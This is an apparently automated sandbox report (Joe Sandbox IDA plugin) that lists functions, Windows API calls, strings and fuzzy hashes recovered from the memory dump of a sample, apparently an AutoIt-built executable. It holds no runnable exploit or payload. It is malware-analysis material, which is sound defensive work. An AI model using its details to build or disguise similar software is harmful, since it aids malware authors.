Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: fd498665a84379f5979223809a3c965b3550408ece3e92cb5d415d93c6bf00f2
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 6671D576A4071BABD7149A78DC81B7AB3E8EF04724F1482A9FA14D76C1EB70D908D790

Function 00C32527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C32542
GetMenuItemInfoW.USER32(00C95890,000000FF,00000000,00000030), ref: 00C325A3
SetMenuItemInfoW.USER32(00C95890,00000004,00000000,00000030), ref: 00C325D9
Sleep.KERNEL32(000001F4), ref: 00C325EB
GetMenuItemCount.USER32(?), ref: 00C3262F
GetMenuItemID.USER32(?,00000000), ref: 00C3264B
GetMenuItemID.USER32(?,-00000001), ref: 00C32675
GetMenuItemID.USER32(?,?), ref: 00C326BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C32700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C32714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C32735

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: c3f4a205a455a4ad25cdd192ae6e2119a9a75220fad0d4706103101f37e9fa1f
Instruction ID: 3a7614193c43db62ef223249ae177436cb8ecf5332a523e99068cacaade1cb0f
Opcode Fuzzy Hash: c3f4a205a455a4ad25cdd192ae6e2119a9a75220fad0d4706103101f37e9fa1f
Instruction Fuzzy Hash: 4D618C74920649AFDF21CF64DC89EAE7BB8FB41304F54005AF851A7251D731AE46DB20

Function 00C56F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C56FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C56FA8
GetWindowLongW.USER32(?,000000F0), ref: 00C56FCC
_memset.LIBCMT ref: 00C56FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C56FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C57067

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: d7b4226637c0c330b4af7955d9cecf1e21dcc1d7bdf7bfaecb78706d304b72a4
Instruction ID: daa02f7536d70c282d5f358cc677003caa211e485e9e972698a88bea31561c5a
Opcode Fuzzy Hash: d7b4226637c0c330b4af7955d9cecf1e21dcc1d7bdf7bfaecb78706d304b72a4
Instruction Fuzzy Hash: 46618C75900248AFDB11DFA4DC85FEE77F8EB08710F10015AFA15AB2A1C771AE85DB94

Function 00C26B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C26BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00C26C18
VariantInit.OLEAUT32(?), ref: 00C26C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00C26C4A
VariantCopy.OLEAUT32(?,?), ref: 00C26C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00C26CB1
VariantClear.OLEAUT32(?), ref: 00C26CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00C26CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C26CDC
VariantClear.OLEAUT32(?), ref: 00C26CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C26CF9

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 866f2a738596fb70f1f901dbbfab7d2aa0e5b7366949dee311f920f57badf308
Instruction ID: 168ce91a4ce1555c8dafdbf7dcf7c92e8f6da147f5484690bbc8ac0fe273ca67
Opcode Fuzzy Hash: 866f2a738596fb70f1f901dbbfab7d2aa0e5b7366949dee311f920f57badf308
Instruction Fuzzy Hash: 9D4154759002299FCF04EF64D848AAEBBB9EF08351F008079E955E7261DB30E946DFA0

Function 00C483BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD9837: __itow.LIBCMT ref: 00BD9862
Part of subcall function 00BD9837: __swprintf.LIBCMT ref: 00BD98AC

CoInitialize.OLE32 ref: 00C48403
CoUninitialize.OLE32 ref: 00C4840E
CoCreateInstance.OLE32(?,00000000,00000017,00C62BEC,?), ref: 00C4846E
IIDFromString.OLE32(?,?), ref: 00C484E1
VariantInit.OLEAUT32(?), ref: 00C4857B
VariantClear.OLEAUT32(?), ref: 00C485DC

Strings

Failed to create object, xrefs: 00C48479, 00C4852F
NULL Pointer assignment, xrefs: 00C484B3
Invalid parameter, xrefs: 00C484FA

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: a79c36f9b22251ffb17699f486dca3e366939d9b008fdfb820fb79bdedb76f7d
Instruction ID: cbd31171ddb5345633af36f88f46e711b070086b279388dae81553988201e1ad
Opcode Fuzzy Hash: a79c36f9b22251ffb17699f486dca3e366939d9b008fdfb820fb79bdedb76f7d
Instruction Fuzzy Hash: 2E619C706083129FD710EF54C848B6EBBE8BF49B54F04455DF9869B291DB70EE88CB92

Function 00C45732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C45793
inet_addr.WSOCK32(?,?,?), ref: 00C457D8
gethostbyname.WSOCK32(?), ref: 00C457E4
IcmpCreateFile.IPHLPAPI ref: 00C457F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C45862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C45878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C458ED
WSACleanup.WSOCK32 ref: 00C458F3

Strings

Ping, xrefs: 00C45816

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: e560dd14fa2da7a7dbf5e18a38c351f07f40085161b6febde5184f569104fd7a
Instruction ID: 9452a39a6a414b369980070a9090857b747b48da5b83c58587c7499464189dde
Opcode Fuzzy Hash: e560dd14fa2da7a7dbf5e18a38c351f07f40085161b6febde5184f569104fd7a
Instruction Fuzzy Hash: EC518C356407009FDB20AF25DC45B2ABBE4BF48720F04496AF966EB2E2DB30E940DB41

Function 00C3B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C3B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C3B546
GetLastError.KERNEL32 ref: 00C3B550
SetErrorMode.KERNEL32(00000000,READY), ref: 00C3B5BD

Strings

NOTREADY, xrefs: 00C3B57C
INVALID, xrefs: 00C3B58F
UNKNOWN, xrefs: 00C3B575
READY, xrefs: 00C3B596
READONLY, xrefs: 00C3B588

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 1ee27edd46f99c60d4c96947ffff90c20086a0bec85cdf9e024a8744b9b9f7ac
Instruction ID: 87f4b34e4c1900467b3a3d8e36c050efe90a35b43ac81db259b4c8c689069c60
Opcode Fuzzy Hash: 1ee27edd46f99c60d4c96947ffff90c20086a0bec85cdf9e024a8744b9b9f7ac
Instruction Fuzzy Hash: 36318135A00205AFCB10EBA8CC45FBEB7B4FF48315F504166E616E7291DB719E46CB91

Function 00C28F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

Part of subcall function 00C2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C2AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C29014
GetDlgCtrlID.USER32 ref: 00C2901F
GetParent.USER32 ref: 00C2903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C2903E
GetDlgCtrlID.USER32(?), ref: 00C29047
GetParent.USER32(?), ref: 00C29063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C29066

Strings

ComboBox, xrefs: 00C28F9C
ListBox, xrefs: 00C28FD1

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: cee3578e0288d029fa5c0a9bc2973de613b49573eb72f5a0bea6c4a1c831b918
Instruction ID: 27f8d9c21c7f6953d33706f0deddf6658bac3546cd43f37664a13aa293b18fcd
Opcode Fuzzy Hash: cee3578e0288d029fa5c0a9bc2973de613b49573eb72f5a0bea6c4a1c831b918
Instruction Fuzzy Hash: DE21D674A00208BBDF04ABA4DC85FFEBBB5EF49310F10016AB961A72E1EF755955DB20

Function 00C2907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

Part of subcall function 00C2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C2AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C290FD
GetDlgCtrlID.USER32 ref: 00C29108
GetParent.USER32 ref: 00C29124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C29127
GetDlgCtrlID.USER32(?), ref: 00C29130
GetParent.USER32(?), ref: 00C2914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C2914F

Strings

ComboBox, xrefs: 00C29087
ListBox, xrefs: 00C290BC

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 586a5a5e0b4853028b1d71a116e17654407cabb272c4544d354087393e38b229
Instruction ID: 6efcc2030effe937624221ad8457ae654aa1378cd8f9063200e1fb38f8a531b8
Opcode Fuzzy Hash: 586a5a5e0b4853028b1d71a116e17654407cabb272c4544d354087393e38b229
Instruction Fuzzy Hash: E2212C74A00208BBDF14ABA5DC85FFEBBB4EF48300F10006AF551A72A1EF754555DB20

Function 00C29163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00C2916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00C29184
_wcscmp.LIBCMT ref: 00C29196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C29211

Strings

smallicons, xrefs: 00C291D9
list, xrefs: 00C291F3
SHELLDLL_DefView, xrefs: 00C29190
details, xrefs: 00C291BF
largeicons, xrefs: 00C291A5

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 02aafe44570252bee9314f9e6ffa22a80b2aebac493474083440302b274103b9
Instruction ID: cacba808bbb98d78463bf711c6f12d32ec0c7d0acb6678e5e86b52c856095613
Opcode Fuzzy Hash: 02aafe44570252bee9314f9e6ffa22a80b2aebac493474083440302b274103b9
Instruction Fuzzy Hash: 0F110A3A24831BB9FA153625FC0AEBB37DCDB15720F30016AFA10A58E2FE7199615694

Function 00C488AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C488D7
CoInitialize.OLE32(00000000), ref: 00C48904
CoUninitialize.OLE32 ref: 00C4890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00C48A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00C48B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00C62C0C), ref: 00C48B6F
CoGetObject.OLE32(?,00000000,00C62C0C,?), ref: 00C48B92
SetErrorMode.KERNEL32(00000000), ref: 00C48BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C48C25
VariantClear.OLEAUT32(?), ref: 00C48C35

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: b78e55704b8aff890710e44eae21e277951d1f218319900fd722dac225bf1e4d
Instruction ID: 7795a389e5f042c2586d5de4750840211e360f7d7f17ca8812911740a6f3b08e
Opcode Fuzzy Hash: b78e55704b8aff890710e44eae21e277951d1f218319900fd722dac225bf1e4d
Instruction Fuzzy Hash: 82C114B1608305AFD700DF64C884A2EB7E9FF89348F00496DF9999B251DB71ED4ACB52

Function 00C37990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C37A6C

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 9dd6bcfc88067d18124d6b559149a1db955c47aa9a914eff314ca16099ad453d
Instruction ID: df1c43d0f6b4a0e5c0d6f716ce7c45f5775194cf31424d723d92210cce7e707c
Opcode Fuzzy Hash: 9dd6bcfc88067d18124d6b559149a1db955c47aa9a914eff314ca16099ad453d
Instruction Fuzzy Hash: 2FB1F3B592421A9FDB20DFA4D884BBEB7F4FF09321F204269EA11E7251D734E941DB90

Function 00C311CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C311F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C30268,?,00000001), ref: 00C31204
GetWindowThreadProcessId.USER32(00000000), ref: 00C3120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C30268,?,00000001), ref: 00C3121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C3122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C30268,?,00000001), ref: 00C31245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C30268,?,00000001), ref: 00C31257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C30268,?,00000001), ref: 00C3129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C30268,?,00000001), ref: 00C312B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C30268,?,00000001), ref: 00C312BC

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 54f140dbb81efb06d5eec5ffd4b1ec9347add2bbfba8f56b26ba659c42560f43
Instruction ID: 525356815b2d1494ed509475a50e258cb7518e9228829a5e5b1e285bf49296b0
Opcode Fuzzy Hash: 54f140dbb81efb06d5eec5ffd4b1ec9347add2bbfba8f56b26ba659c42560f43
Instruction Fuzzy Hash: 44318D79610304FFDB149F94EC88FAE77A9AB54312F14812AFD10D61A0D7B59E808B60

Function 00BDFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BDFAA6
OleUninitialize.OLE32(?,00000000), ref: 00BDFB45
UnregisterHotKey.USER32(?), ref: 00BDFC9C
DestroyWindow.USER32(?), ref: 00C145D6
FreeLibrary.KERNEL32(?), ref: 00C1463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C14668

Strings

close all, xrefs: 00BDFAA1

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 3f80739839ecea430764821de98395b8c114638611f9b4169d8b54629b380e14
Instruction ID: 65f45109eabcd72e76effb16878765df0fdda412e9213d01547bc870489bc327
Opcode Fuzzy Hash: 3f80739839ecea430764821de98395b8c114638611f9b4169d8b54629b380e14
Instruction Fuzzy Hash: F4A14B34705212CFCB29EF14C995A79F7A4EF16704F1442EEE80AAB262DB30AD56DF50

Function 00C2A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00C2A439), ref: 00C2A377

Strings

TEXT, xrefs: 00C2A2AE
CLASSNN, xrefs: 00C2A119
CLASS, xrefs: 00C2A0F6
INSTANCE, xrefs: 00C2A285
REGEXPCLASS, xrefs: 00C2A13C
NAME, xrefs: 00C2A1A9

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 44ed4ee45abecdef8241b4d1f0caf21fc96907bfaa59e2f3029c9fef1f1d384e
Instruction ID: 9ac770dbe41d195140437b1574117cebe8a87816531dba3d9ae722f1769b3887
Opcode Fuzzy Hash: 44ed4ee45abecdef8241b4d1f0caf21fc96907bfaa59e2f3029c9fef1f1d384e
Instruction Fuzzy Hash: FD91E531600A16EBCB08EFA0D442BEDFBB5FF14310F508159E959A3651EF30AA99CB91

Function 00BD2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00BD2EAE

Part of subcall function 00BD1DB3: GetClientRect.USER32(?,?), ref: 00BD1DDC
Part of subcall function 00BD1DB3: GetWindowRect.USER32(?,?), ref: 00BD1E1D
Part of subcall function 00BD1DB3: ScreenToClient.USER32(?,?), ref: 00BD1E45

GetDC.USER32 ref: 00C0CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C0CD45
SelectObject.GDI32(00000000,00000000), ref: 00C0CD53
SelectObject.GDI32(00000000,00000000), ref: 00C0CD68
ReleaseDC.USER32(?,00000000), ref: 00C0CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C0CDFB

Strings

U, xrefs: 00C0CCD0

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

